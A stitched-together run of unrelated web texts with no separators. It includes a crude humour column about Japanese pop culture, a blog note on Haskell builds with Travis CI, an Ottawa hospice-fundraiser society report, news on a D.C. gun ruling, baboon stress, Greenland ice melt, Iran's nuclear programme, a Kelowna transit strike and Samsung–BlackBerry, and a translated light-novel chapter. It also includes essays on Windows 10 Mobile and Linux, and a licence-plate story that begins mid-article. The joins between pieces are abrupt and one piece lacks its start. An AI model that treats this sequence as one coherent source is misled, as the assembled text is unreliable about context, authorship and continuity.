Japan seems to get away with a lot of shit because we don't get it. If someone installed a panty vending machine outside of a Stuckey's in your neck of the woods, that shit would not go over well at all. Nor would an entire subculture of sexualized schoolgirls dressed as sailors, because nautical debauchery is still debauchery, and we want to keep our kids away from that. Unless it's in Japan and we can't tell if it's dirty or not. We think it is -- everyone is pretty convinced Japan is as perverted as all the dirty uncles in America combined into one PerVoltron -- but since we're not sure, we keep inviting them over for Christmas and just watching them with sidelong glances. A lot of 'em.
Continue Reading Below Advertisement
This video by New Idol Order is about 14 minutes long, so if you can sit through the whole thing, you're a trooper. They're not nearly as polished as Babymetal, and their music is less music and more rage-screaming in a mall food court, which seems to be where this was filmed. But I include it for illustrative purposes. Stroll through the video and stop on the crowd scenes, and see if you can count the number of people who seem to be extremely engaged in the show yet at the same time seem to be the sorts of people who maybe need to inform you when they move into the neighborhood. I'm saying maybe is all; I have no definitive answers. I just find it weird when I see balding and graying men headbanging to teenagers in a mall.
Continue Reading Below Advertisement
The Babymetal song "Gimme Chocolate," if the lyrics translations I found are to be believed, is legitimately about wanting to eat chocolate. How the fuck is that even possible?
Fun Button (Press at own risk)
Building Haskell code on travis is a bit complicated. Haskell happens to be one of the less well supported languages on travis.
Travis ships with an older version of ghc (I think its 7.8) and cabal. But many projects either rely on newer versions of ghc, such as elm-init or want to be compatible with older ghc, such as ja-base-extra. This requires building with either a different version of ghc or multiple ghc/base library versions.
There's a wonderful project by a github user named @hvr. The project itself is called multi-ghc-travis and provides an example .travis.yml which configures a matrix of build environments for travis based on as many ghc and cabal versions as you require by manually downloading and installing the necessary ghc ppa's on the build VM.
This is great and all, however bears a downside as it requires root privileges in the VM to add ppa's and install packages, which prohibits use of the new and faster, container based travis architecture.
There has been some nice development in container customization lately and as a result there's now a container compatible way of customizing your Haskell build environment on travis as this section of the README shows.
The even nicer thing is that the repository also provides you with a Haskell script that automatically creates the new-style .travis.yml from your tested-with section in your .cabal file. Simply provide the script with a .cabal file and pipe the output into a file called .travis.yml and you're pretty much set.
Now I found it rather difficult to find information on how the tested-with section in a .cabal file should look. The cabal documentation simply states that it contain list compiler.
Searching further I found that compiler is supposed to be the short name of a compiler, such as ghc version bounds for that compiler. Those version bounds are very similar to those of dependencies. Resulting in a field which looks something like this:
tested-with: GHC >= 7.0 && < 7.10, LHC >= 0.6 && < 0.8
That's all I've got for now. If you've got something to add catch me on Twitter.
Lesley Holmes and her late husband, former NHLer Bill Kitchen, built their dream Dow's Lake home to be an inviting space for friends and family, and to host parties that could help out worthy causes.
Next month, she'll have as many as 2,000 curious folks stroll through her place as part of Hospice Care Ottawa's signature fundraiser, Homes for the Holidays. And she's totally cool with it.
“I love opening the doors,” said the Tim Hortons franchisee, while acknowledging she has a beautiful home. “I love having people come in and enjoy it with me.”
She and other supporters of the community-based charitable organization gathered Wednesday at the Savour Every Moment launch event held at Earnscliffe, official residence of British High Commissioner Howard Drake and his wife, Gill.
The diplomat did a nice job of welcoming some 80 guests and making them feel comfortable inside the Victorian manor, famous for being where our Glasgow-born first prime minister, Sir John A. Macdonald, lived and died.
Guests included Cuckoo Kochar, president and founder of Phoenix Homes, with his family. Their magnificent abode along the Rideau River is also among the eight homes that the public will see festively decked out during this year's tour.
Last year's honorary chairs Dennis Laurin, of the Laurin Group, and his wife, Andrea, attended. In 2014, they opened up their Rockcliffe Park home for the tour, with pleasing results. Said Laurin: “We went to the cottage that weekend and when we got back we couldn't tell that a soul had gone through it. The volunteers were unbelievable.”
Sharon Lalonde, a sales representative with Coldwell Banker Rhodes & Company, is chairing this year's event (the honorary chairs are Ned and Liz Rhodes).
Hospice Care Ottawa helps, at no charge, people in our community on their palliative and end-of-life journey through 24-hour, seven-days-a-week residential hospice care, in-home volunteer support and day hospice programs. It also provides bereavement support to families.
“Our philosophy really is about helping people live until they die,” said Hospice Care Ottawa executive director Lisa Sullivan, borrowing a phrase coined by a Brit: Dame Cicely Saunders, founder of the modern hospice movement.
The sponsored reception was catered by Thyme & Again and featured Gingerbread Builder Bake-off champ Catherine Beddall giving a decorating demo near the silent auction items.
As well, sweet treats awaited guests on their way out the door with home-shaped cookies from Cinfully Delicious, each one iced with a brick, stone or wood pattern.
Share Tumblr Pinterest Google Plus Reddit LinkedIn Email
GALLERY: From left, Hospice Care Ottawa's manager of fund development, Sue McIntosh, along with its communications coordinator, Kristina Voth-Childs, and special events coordinator, Debbie Brown, made sure guests left with a custom cookie by Cinfully Delicious at a launch event for Homes for the Holidays, held Wednesday, October 12, 2016, at the official residence of the British high commissioner. Caroline Phillips /Ottawa Citizen
From left, David Caulfield and Elizabeth Kaulback with Mary Ann Turnbull and Chris Turnbull at the official residence of the British high commissioner on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
From left, Barb Johnston-Iafelice with Mary Jane Manley at the official residence of the British high commissioner on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
British High Commissioner Howard Drake with Nancy Pyper, president of the May Court Club of Ottawa, at the official residence of the British high commissioner on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
Coldwell Banker Rhodes & Company broker of record/partner Jim McKeown with his wife, Sharon Lalonde, 2016 chair for Homes for the Holidays, at the official residence of the British high commissioner on Wednesday, October 12, 2016, for the launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
Lesley Holmes, with her friend Mark Fowler, at the official residence of the British high commissioner on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
Pastry artist and gingerbread house competition champ Catherine Beddall showed off her talents at the official residence of the British high commissioner on Wednesday, October 12, 2016, during the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
Madhu Kochar and her husband, Cuckoo Kochar, president of Phoenix Homes, at the official residence of the British high commissioner on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
Lawyer Marc Jolicoeur, a partner with BLG, and Jeannie Thomas on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
Dennis Laurin, owner of the Laurin Group, and his wife, Andrea, on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
Rahul Kochar from Phoenix Homes with his wife Simran at the official residence of the British high commissioner on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
From left, Lisa Sullivan, executive director of Hospice Care Ottawa, with Sharon Lalonde, 2016 chair for Homes for the Holidays, and British High Commissioner Howard Drake and his wife, Gill, at their official residence on Sussex Drive on Wednesday, October 12, 2016, for the Savour Every Moment launch party for Hospice Care Ottawa's Homes for the Holidays fundraiser. Caroline Phillips /Ottawa Citizen
The Homes for the Holidays tour takes place from November 18 to 20. Tickets are now on sale for $50.
carolyn001@sympatico.ca
Judges Overturns D.C. Ban On Handguns In Public
Enlarge this image toggle caption Al Behrman/AP Al Behrman/AP
A federal judge has overturned a District of Columbia ban on carrying handguns in public, concluding that the Second Amendment protects a person's right to firearms outside the home.
In a 19-page ruling that was written on Thursday, but only released late Saturday, Judge Frederick J. Scullin Jr. ordered the city to allow residents to carry handguns — a milestone in a case that has been dragging on for five years.
"There is no longer any basis on which this court can conclude that the District of Columbia's total ban on the public carrying of ready-to-use handguns outside the home is constitutional under any level of scrutiny," Scullin of the District of Columbia District Court said. "Therefore, the court finds that the District of Columbia's complete ban on the carrying of handguns in public is unconstitutional."
By way of background, The New York Times notes: "In 2008, the Supreme Court struck down the District of Columbia's all-out ban on handguns on the basis that it violated the right to bear arms guaranteed by the Constitution's Second Amendment. An appeals court in 2011 required handguns to be registered."
The Associated Press says the challenge, Palmer v. District of Columbia, came shortly after the city rewrote its gun laws following the landmark 2008 decision.
AP says: "New rules allowed residents to keep guns in their homes but required that they be registered. Gun owners now have to take a safety class, be photographed and fingerprinted and re-register their weapons every three years. Those requirements have also been challenged in court but were upheld by a federal judge in May."
It was not immediately clear if the D.C. government would appeal the decision.
At last, good news for the beta male.
From the wild to Wall Street, as everyone knows, the alpha male runs the show, enjoying power over other males and, as a field biologist might put it, the best access to mating opportunities.
The beta is No. 2 in the wolf pack or the baboon troop, not such a bad position. But conversationally, the term has become an almost derisive label for the nice guy, the good boy all grown up, the husband women look for after the fling with Russell Crowe .
It may now be time to take a step back from alpha worship. Field biologists, the people who gave the culture the alpha/beta trope in the first place, have found there can be a big downside to being No. 1.
Laurence R. Gesquiere, a research associate in the department of ecology and evolutionary biology at Princeton , and colleagues report in the journal Science that in five troops of wild baboons in Kenya studied over nine years, alpha males showed very high stress levels, as high as those of the lowest-ranking males.
Advertisement Continue reading the main story
The stress, they suggested, was probably because of the demands of fighting off challengers and guarding access to fertile females. Beta males, who fought less and had considerably less mate guarding to do, had much lower stress levels. They had fewer mating opportunities than the alphas, but they did get some mating in, more than any lower-ranking males. After all, when the alpha gets in another baboon bar fight, who's going to take the girl home?
Photo
Behavioral researchers have not ignored the female baboons: other studies have shown that the females have a whole different system of rank, which is inherited from the mother and rarely subject to challenge, so that is one kind of stress they do not have.
April in Greenland is typically very cold, though some years buck the trend. In 2012, for example, the surface of the ice sheet started melting early and then experienced the most extensive melting since the start of the satellite record in 1978. Weather events and temperature anomalies this April suggests that 2016 may be off to a similar start.
The map above shows land surface temperatures for April 2016 compared to the 2001–2010 average for the same month. Red areas were hotter than the long-term average; some areas were as much as 20 degrees Celsius (36 degrees Fahrenheit) warmer. Blue areas were below average, and white pixels had normal temperatures. Gray pixels were areas without enough data, most likely due to excessive cloud cover.
This temperature anomaly map is based on data from the Moderate Resolution Imaging Spectroradiometer (MODIS) on NASA's Terra satellite. Observed by satellites uniformly around the world, land surface temperatures (LSTs) are not the same as air temperatures. Instead, they reflect the heating of the surface by sunlight, and they can sometimes be significantly hotter or cooler than air temperatures.
“The most remarkable aspect here is the incredible departure from 2001-2010 average, especially deep in the ice sheet interior,” said Santiago de la Peña, a research scientist at Ohio State University. “This is accentuated by the fact that the northern regions of the United States and Canada actually experienced cooler than usual temperatures.”
According to de la Peña, a high-pressure weather system sat over the ice sheet through most of April. The system caused temperatures across Greenland to spike, reaching or matching record temperatures in many places. “There have been occasional warming events in the past during spring over Greenland,” he noted, “but they affected only local areas and were not as intense.”
Still, warming events in Greenland are not entirely without precedent. Research by Dorothy Hall, an emeritus scientist at NASA's Goddard Space Flight Center, has showed that major melt events like those in 2012 and 2002 are not uncommon.
De la Peña thinks such events will become more common in the future as atmospheric warming in the Arctic brings about longer melt seasons. For now, he notes that it is still early to predict how the melt season in 2016 will unfold. “High temperatures are still being recorded in May, suggesting we will have major melt events during the summer.”
NASA Earth Observatory image by Jesse Allen using data from the Land Processes Distributed Active Archive Center (LPDAAC). Caption by Kathryn Hansen.
It's a shorter chapter. That's why it's early. It's not like I did it for you guys or anything, okay!? I-I'm not going to make too much a habit of 2 per day, baka!
Chapter 255: Starting Point
“And like that, it doesn't seem that Itsuki will pose a problem. We'll need to monitor him, but as long as Rishia's there, it'll work out. He can't really run, nor does he seem to have the intention of doing so.” (Naofumi)
“I see, then I'll leave him to you.” (Queen)
“Well, if he does end up running away again, then I'm really going to dispose of him.” (Naofumi)
“… That's something I would like to avoid.” (Queen)
“Alright. Next, we can use Motoyasu's teleportation to make use of Cal Mira's healing onsen.” (Naofumi)
“The heroes all seem to have an overly convenient warping ability. Please make use of it to recuperate yourselves.” (Queen)
Before Motoyasu left for Faubley, I ordered him to take Ren there once to make sure we could open a portal if necessary.
We negotiated with the Count there and got permission to use the onsen that cures curses every night.
With this, the curses should pass faster.
“… We suffered quite some heavy damage during this incident.” (Queen)
“Yeah.” (Naofumi)
It's the same at my place.
Though, it's still within levels that we can recover from, and my Filo Rials are helping in procuring materials. It seems recovery will be faster than expected.
I didn't want to spread the Camping Plants too much, but I've had to distribute them to the village.
I also brought some here to use as temporary relief. We'll all be able to manage somehow.
Though, I dread what's become of this nation's finances.
Ah, right. The base the Three Hero Church used had some treasure piled up in it. Apparently, it came from the nobles.
The Queen decided that all of it would go towards financing the recovery effort.
This country's trash has finally been driven out.
“Again… and again, I kept telling her to correct her personality. Even from when she was little.” (Queen)
“Like I care.” (Naofumi)
“That's right… this is all due to my negligence.” (Queen)
“You're also slacking on Trash duty.” (Naofumi)
“… He was an extraordinary person at the start, but he's changed. He was swallowed by the power and authority he obtained.” (Queen)
I peer out the window again. Fohl and Atlas are questioning Trash.
Trash is absentmindedly staring in the direction Witch was taken while he talks.
Hmm?
Fohl seems speechless.
What could they be talking about?
“The executions will start up tomorrow, but what will you do, Iwatani-sama?” (Queen)
“I'll stay for some closure. After the primary offenders are taken care of, I'll take my leave. I have to deal with Itsuki and prepare for the next wave. I can't really afford to waste my time here.” (Naofumi)
“I see. Then we'll get into contact with you later.” (Queen)
I can finally give the Wave my undivided attention.
I get the feeling that I've finally gotten to the starting point.
“Then I guess we should be off.” (Naofumi)
After I finish my talks with the Queen, I prepare to head back.
“Ah, we'll be continuing our journey for a little longer.” (Raphtalia)
“I see.” (Naofumi)
So we'll be separating from Raphtalia… I feel a bit of regret, but it seems that she will be done soon.
“Atlas! Atlaaaaas!” (Fohl)
“Onii-sama, just go on your trip already.” (Atlas)
Ah, right. Fohl also completed his Class Up.
I sent Firo with him to the Dragon Hourglass, but it seemed he couldn't perform a special Class Up.
There was no choice, so I sent Gaelion over.
Just what standards do that Ahoge operate on??
With this, Atlas has taken the Firo route, and Fohl, the Gaelion route.
Even now, I can't tell just what makes them different.
Since their race is the same, perhaps I will be able to witness the difference between the two Class Ups.
“Because of Fohl-san, our journey is taking longer than it should. Please be obedient here.” (Raphtalia)
With a fed up voice, Raphtalia reluctantly lifts up her hand and embeds it in Fohl's solar plexus.
“Ugu… I can still go on!” (Fohl)
“Then, me too.” (Atlas)
Atlas chops the back of Fohl's head.
“Guha! A-Atlaa…” (Fohl)
Hey!
Why are you following up?
“Your training is running late?” (Naofumi)
“Yeah. If we give him the chance, he tries to run home. It's quite troublesome.” (Raphtalia)
“Right. The instructor always leaves Fohl-san under Raphtalia-san's watch.” (Rishia)
“Is that so?” (Naofumi)
Dammit, just how much of a Sis-con does he have to be?
He runs away from his own journey.
“I'm currently the strongest of master's disciples, so it naturally turned out like that… I can understand that he treats Atlas-chan dearly, but I think he should put his effort towards getting stronger for her.” (Raphtalia)
“But, it's going to last for only a little longer, right?” (Naofumi)
“Yes. I look forward to coming home.” (Raphtalia)
“Then, let me walk you to the outside of the Castle Town.” (Naofumi)
“Thank you.” (Raphtalia)
My group accompanies Raphtalia's to the edge of town.
“Look forward to the souvenirs.” (Raphtalia)
“You got some?” (Naofumi)
“Yes. We brought a large variety.” (Raphtalia)
Are they materials she got while training? If so, I'd definitely want them.
Raphtalia has values similar to mine. She probably knows what would make me happy.
“Well then.” (Raphtalia)
“'Cya soon.” (Naofumi)
I wave my hand as I watch Raphtalia set out.
“Then, should we be off as well?” (Atlas)
“Yeah, we already sent Ren and Rishia home ahead of time. We should…” (Naofumi)
“Carriage…” (Firo)
Firo suddenly lets out a questioning voice.
For some reason she looks like she's going to cry.
“Ah, yes, yes. I haven't stopped by the Old Man's place yet, so I better go ask him.” (Naofumi)
Does not have a carriage bother her that much?
But, I am also worried about the Old man, so it's not a bad idea to check.
Though, I did talk with him a bit after the incident.
Apparently, the Three Hero Church remnants raided his shop and tried to stab him with the Dagger of Mob Mentality.
He could tell it was a strange weapon at a glance, so he immediately knocked them senseless, closed shop, and locked them up in an acquaintance's house.
I did warn him, so this was to be expected.
After the incident began escalating, he helped evacuate the populace.
He truly is a reliable person
More importantly, just what level is that Old Man?
Level isn't related to combat experience and technique, so perhaps it's a rude thing to ask.
But, he seems to have a lot of experience for some reason.
“Oh, if it isn't the young lad.” (Old Man)
“How's your store been faring?” (Naofumi)
“Quite a bit's been stolen, but it seems that my money is still safe.” (Old Man)
“I see. So do you plan on reopening soon?” (Naofumi)
“I can open at any time. Though, my variety won't be the best.” (Old Man)
“Then won't you come over to my village this time?” (Naofumi)
“Again, laddie? I have no intentions of answering you at this point in time.” (Old Man)
Imya's Uncle has just returned, so I shouldn't be too insistent with my invitation.
“And, what are you here for today?” (Old Man)
“My bird is begging for her new carriage.” (Naofumi)
“Ah, that matter. I'm sorry, young lady, it's not done yet.” (Old Man)
“I see… Firo is sad.” (Firo)
“As compensation, I'll use some techniques from Faubley to improve it. Don't worry.” (Old Man)
“What do you plan on doing?” (Naofumi)
“They have something that lifts the wheels and body to lessen impact apparently.” (Old Man)
… Suspension?
I see. This world has such things as well.
The old man unrolls a blueprint and shows it to me.
It involves attaching simple springs to the Wheel's couplings.
“Then…” (Naofumi)
I supplement the design by sketching a damper on it.
Even so, it only uses simple pipes, water and air pressure.
It's not like I'm that knowledgeable on the matter.
I'm only reiterating information that one of my friends who liked cars lectured to me long ago.
However, even with that, the Old Man's eyes shine with admiration. He nods a few times.
“Boy, you know some interesting things. I'll test it out.” (Old Man)
“My world was one without magic. If you try using magic with this design, I think you may get a good effect.” (Naofumi)
“I understand, boy. You don't need to sketch it all out. I have the inspiration.” (Old Man)
“I see. I'll look forward to it.” (Naofumi)
“Yeah! Firo will look forward!” (Firo)
After looking over the blueprints with the old man, we warp back to the village.
FILE- In this Feb. 15, 2012, file photo, provided by the Iranian President's Office, Iranian President Mahmoud Ahmadinejad, right, is escorted by technicians during a tour of Tehran's research reactor center in northern Tehran, Iran. Iran's envoys are heading for nuclear talks with confidence that the chips are falling their way. Iran's denials that it is trying to develop nuclear weapons carry a distinctly hollow ring among its foes as the U.N. nuclear watchdog piles on worries: Complaining about limits on inspection access and reporting that Tehran is expanding its nuclear fuel labs. But, as Israel increasingly weighs the option of a military strike, Western leaders wary of another Middle East conflict may have to pay closer attention to the claims. (AP Photo/Iranian President's Office, File)
VIENNA (AP) — The U.N. atomic agency has received new and significant intelligence over the past month that Iran has moved further toward the ability to build a nuclear weapon, diplomats tell The Associated Press.
They say the intelligence shows that Iran has advanced its work on calculating the destructive power of an atomic warhead through a series of computer models that it ran sometime within the past three years.
The diplomats say the information comes from Israel, the United States and at least two other Western countries and concludes that the work was done sometime within the past three years. The time-frame is significant because if the International Atomic Energy Agency decides that the intelligence is credible, it would strengthen its concerns that Iran has continued weapons work into the recent past — and may be continuing to do so.
Because computer modeling work is normally accompanied by physical tests of the components that go into a nuclear weapon, it would also buttress IAEA fears outlined in detail in November that Tehran is advancing its weapons research on multiple fronts.
"You want to have a theoretical understanding of the working of a nuclear weapon that is then related to the experiments you do on the various components," said David Albright, whose Washington-based Institute for Science and International Security is a frequent go-to source on Iran for Congress and other U.S. government branches. "The two go hand-in-hand."
Such computer mock-ups typically assess how high explosives compress fissile warhead material, setting off the chain reaction that results in a nuclear explosion. The yield is normally calculated in kilotons.
Any new evidence of Iranian research into nuclear weapons is likely to strengthen the hand of hawks in Israel who advocate a military strike on Iran. They argue that Tehran is deliberately stalemating international efforts at engagement while continuing its clandestine weapons work.
Iran denies any interest in nuclear weapons and says suspicions that it ever tried to develop them are based on fabricated U.S, Israeli and other intelligence. At the same time, it has blunted IAEA efforts to investigate such claims for more than five years.
It also has scoffed at Western allegations that it is enriching uranium to make the core of nuclear warheads, saying it seeks only to create reactor fuel. But it refuses to accept offers of such fuel from abroad and is now producing material that is easier to turn into weapons-grade uranium than its main, lower-enriched stockpile.
The revelations come as Israeli officials are expressing growing alarm over what they see as continuing Iranian progress toward nuclear arms.
Israeli Prime Minister Benjamin Netanyahu engaged this week in a strident public exchange with the U.S. administration, calling on Sunday for "red lines" to be set for Iran. The calls were rebuffed, and on Tuesday, Netanyahu declared that "those in the international community who refuse to draw a red line on Iran don't have a moral right to place a red light before Israel."
Netanyahu said that sanctions were hurting Iran's economy but not nearly enough to compel it to stop the nuclear program, and said negotiations by the international community with Iran on the issue had failed.
Israel's position is that airtight sanctions are needed against Iran's central bank and oil exports. Because Asian nations in particular keep buying Iranian oil the country remains a top OPEC oil exporter, even though there are signs that its revenues are down and, with the currency plummeting, standards of living in Iran have fallen.
The comments from Netanyahu were the latest suggestion that Israel is considering taking military action on its own to at least slow down Iran's program. That prospect could badly rattle world markets and spark wider war, and is opposed not only in most Western capitals but also among many in Israel's security and political establishment. But Israeli officials have said that with Iran moving facilities underground its window of opportunity is closing while the world dithers with an inadequate sanctions regime.
Although some of the new information was said to have been supplied by the United States, it appears to run counter to the stated U.S. position that Iran shut down wide-ranging secret research and development of the components of a nuclear weapons program in 2003. At the same time the U.S. fears that Iran continues to move toward the threshold of making such arms by enriching uranium.
Nate Ralph/CNET
At an enterprise event in San Francisco on Thursday, Samsung and BlackBerry announced a partnership that couples Samsung's Knox platform with BlackBerry's enterprise know-how. It's all built on BlackBerry's upcoming BlackBerry Enterprise Services 12 platform, and aims to bolster Android security by leveraging BlackBerry's end-to-end encryption expertise.
This seems like a strange move for BlackBerry, as executives were keen to point out: BlackBerry CEO John Chen went so far as to joke that he was torn on whether or not to wish Samsung well in the future. But the partnership makes a lot of sense: while BlackBerry's smartphone market share has declined, the company's reputation as an enterprise-and-security powerhouse remains strong.
Samsung, by contrast, has taken a notable lead in the US marketplace, and has made inroads into bridging the work and personal device divide. The company's business-focused Knox has been positioned as an answer the Bring Your Own Device debate, by allowing folks on Samsung smartphones and tablets to seamlessly transition between work and personal data, quickly and securely, on a single device. While the security software has gotten the nod from places as high as the Pentagon, there have been reports of security flaws that have shed some doubt on the service.
This partnership with BlackBerry would strengthen Knox's security pedigree, while simultaneously injecting BlackBerry's BES 12 software into companies that decides to adopt Samsung's Knox platform. It'll be available early next year, with more information on subscription prices to come.
James Martin/CNET
Last summer, Microsoft said it was 'changing strategy' with its mobile OS; instead of trying to sell phones to everyone, it was planning to concentrate on reaching fans with flagship devices and on reaching businesses with a secure phone that's good for productivity.
It's an open question whether Microsoft can manage that and the significant drop in phone sales revealed in the company's latest financial results has naturally led to questions about the future of Windows 10 Mobile.
It's certainly too early to say whether Windows 10 Mobile is going to appeal to business, with only one handset out that can support Continuum, and the FIDO standard (that will use the iris scanner on the new Lumias to log you in to enterprise applications and consumer services without needing passwords, even apps running on your PC or Mac) isn't finished yet.
In very many ways, Windows 10 is still a work in progress, with an annoying number of regressions (from issues with offline Maps navigation, to not being able to record audio in OneNote, to not being able to open some forwarded messages in Outlook, to problems with the swipe keyboard in third party apps, to not being able to sync open tabs between your phone and PC browser... to mention only the ones that particularly annoy me).
The immaturity of Windows 10 Mobile is a casualty of re-implementing the OS on yet another platform, and of the unpopularity of Windows 8.
When Microsoft moved from the Windows CE underpinnings of Windows Phone 7 to the NT kernel for Windows Phone 8, it kept the same interface, with the signature Windows Phone design, making for an impressively smooth transition (as long as you were prepared to buy a new handset).
Because the Windows 8 interface was perceived as such a failure on PCs (although I'm far from the only Windows 8 fan, I'm not in the majority), Windows 10 Mobile had to change the design as well as the internals and all those extra moving pieces have left their mark.
Personally, I'm waiting the same four months it took Windows 10 to stabilize from when it shipped in July to the far-more-mature November update before I make up my mind -- and until the OS is ready for OEMs like Acer and Alcatel to start shipping their handsets.
But in many ways, the future of Windows Mobile is the future of Windows Store apps, and they're not going away whatever happens to Windows Mobile. The Universal Windows Platform, as Microsoft calls the latest version of what we've previously called WinRT, Metro, modern, and Windows Store apps, means the Netflix app that works on Windows 10 and Windows 10 Mobile will also work on Xbox and even on IoT devices (why can't the screen on your smartfridge show you that there's a new episode of House of Cards to watch?).
The appeal of writing for all those different devices at once (with plenty of encouragement from Microsoft, no doubt) is getting some new partners onto Windows 10, like the Ring video doorbell. If that really succeeds, it will deal with a lot of the 'app gap' -- and Microsoft needs it to succeed, for the future of Windows as well as the future of Windows phones.
Windows needs to be mobile. It needs to be a credible tablet OS as well as a strong desktop and notebook OS (and while a tablet OS and a phone OS aren't exactly the same, we increasingly treat phones as computers that fit in our pockets rather than something that's first and foremost for making calls and sending text messages).
IDC's predictions for the PC market in 2016 show a drop of 3.1 percent -- unless you count 2-in-1 PCs and detachable tablets like the Surface as PCs, in which case it's going to grow 1 percent or 2 percent.
Leaving aside the question of why a tablet with a removable keyboard isn't a PC even when it runs Windows, if you look at the predictions and Apple's latest sales figures, it seems that smartphones, PCs, and tablets have something fundamental in common.
Whether it's a PC or a tablet or a smartphone, we keep buying new devices until we get one that's good enough and then we keep it until it needs replacing -- and the devices that have come out in the last couple of years are essentially good enough that we're not rushing to replace them.
Tablets that have their own keyboard when you need it (which is what I think is important about so-called detachable tablets) are a growth area, probably because they're not yet common -- but also because of the continuing trend to mobile devices. Windows needs to be a mobile OS to handle tablets -- and phones and phablets come along for the ride.
But Windows also needs 'mobile' apps, even if you're using a traditional notebook or a desktop (or a compote stick or any other form of PC), because the attack surface in traditional Windows applications is just too big. Viruses are too easy to install in the familiar software world. And desktop software is harder for Windows to control in ways that, say, extend battery life on mobile devices. Modern, mobile apps can run a service that stays connected the way an app on a smartphone stays connected without using enough CPU to dent your battery life.
There are always going to be big applications like Excel and Photoshop and CAD software, but for a lot of what people do on computers, the sandboxed apps of mobile platforms make life much safer. If the Edge browser can run as a sandboxed UWP app, what we've thought of as mobile apps can be more powerful.
Win32 applications aren't dead or dying, but WinRT and UWP apps are the future of Windows app development. Windows Mobile can be the beneficiary of that, giving Microsoft the option of its own mobile OS alongside the strategy of putting Microsoft apps and services on iOS and Android -- as long as Microsoft can turn it into a platform that's efficient for the Windows team to create without needing it to be a major hit overnight.
That way, there's the chance of it staying the course and -- just maybe -- becoming a sleeper hit once it matures, because there are still plenty of great features in Windows 10 Mobile struggling to be noticed.
More on Windows 10 Mobile
First Canada has reached a tentative contract agreement with the Amalgamated Transit Union (ATU) Local 1722, who have been on strike the past 13 days.
The ATU is expected to present the terms of the deal to its membership tomorrow, Nov. 23, 2016.
First Canada plans to resume all transit services as quickly as possible, likely by Nov. 24.
The City of Kelowna played a significant role in bridging the divide between the union and the company.
“We are grateful to Kelowna Mayor Colin Basran and City of Kelowna staff who helped broker this agreement,” said John Peck, First Canada Regional Vice-President.
“We sincerely regret the inconvenience to our valued customers for the interruption of transit services and we look forward to working with our employees as we restore this vital community service.”
First Canada is asking transit users in the Kelowna Regional Transit System for their patience over the next few days as the company works to mobilize staff, schedules and its fleet.
The ATU walked out on First Canada on Nov. 10. No public transit had been running since the strike began.
Ms. Morgan said she was pleased with the settlement but also alarmed by online critics who threatened to vandalize her car if they happened to see her now well-known license plate.
“I am almost hesitant to display my tag,” she said. “I cannot wrap my brain around the thought that anyone would vandalize a vehicle simply because they do not share the driver's belief system.”
Atheist drivers will not be the only ones to benefit from the settlement. The Motor Vehicle Commission also agreed to honor license plate applications that contained language related to atheism, feminism or L.G.B.T. people, including phrases like “EQUALITY,” “LGBTQ,” “4WOMEN” and “SECULAR.”
Mr. Katskee said Ms. Morgan and her legal team “made up the list with an eye toward things she might want in the future and that were otherwise at risk of having the same sort of discrimination.”
Ms. Bellack, the spokeswoman for the commission, said it had issued atheist-themed license plates in the past. That offered little relief to Ms. Morgan's lawyer, however, who said her legal team pursued a lawsuit because it was concerned the commission might reject future license plate applications its employees found distasteful.
Ms. Morgan's application was the second instance in less than two years that the commission had rejected an atheist license plate, Mr. Katskee said.
The first was when David Silverman, the president of an organization called American Atheists, applied for a license plate that said “ATHE1ST” in 2013. The commission rejected his application because it was deemed “offensive,” Mr. Silverman said, but he appealed the decision in writing and the commission reversed course two days later.
“The issue is not that I was able to get my plate, the problem was that the system discriminated against me and made me appeal,” Mr. Silverman said. He added: “Atheism is not a dirty word. It's a great word, in fact.”
Mark Shuttleworth, the founder of Canonical, publishers of Ubuntu, has given up on the idea that Linux (which Ubuntu is based on) will ever supplant Windows, saying that if any OS will be the next big thing it's Apple's iOS or Google's Android.
While there remains talks of an Ubuntu Phone OS, it may be too little too late.
So what happened?
Lots happened, and none of it good. Linux never got past serious server room usage because it was never marketed to be more than a gimmickan alternative for cheapskates.
I still keep a machine loaded with the latest Ubuntu and have always believed it was a smart idea to outfit a large corporation with Linux-based PCs and free software. It would save a lot of money, perhaps millions of dollars, and would protect the employees and the company from all the malware written to attack Windows, while being just as efficient.
I don't believe that anyone in the Linux community has ever spent a dime selling that idea, or any other idea for that matter. This was probably the worst example of the ridiculous concept that "if you build a better mousetrap, the world will beat a path to your door." That's never worked except in a market where there is no competition and people desperately need a mousetrap.
Plus, it was always going to be difficult for Linux to supplant an OS like Windows that generally added only about $40 to the cost of a PC anyway.
It boils down to the marketing. The Open Source community, as a whole, doesn't believe in the idea that sales and marketing is actually important. All that ever passed for marketing with that bunch was the gimmicky but cute "Tux" the Linux penguin.
Most important, Linux could never shed the early image of being an old DOS-like operating system with a command line structure. A variety of cool GUI interfaces were long available for the last decade or more, exemplified by Ubuntu. I hardly ever used any command line routines on my Linux box.
So what comes next? We can look ahead to the decidedly inferior iOS and Android operating systems that are better suited for the phone and tablet taking a step to the desktop screen. Or there's Google's Chrome OS, which is worse because of its dependence on the cloud for everything it does.
I've always urged Google to go after the Windows monopoly by putting some serious resources into a genuine disk-based OS, but Google is all-in when it comes to the cloud. And why not? It probably controls most computers in the cloud already.
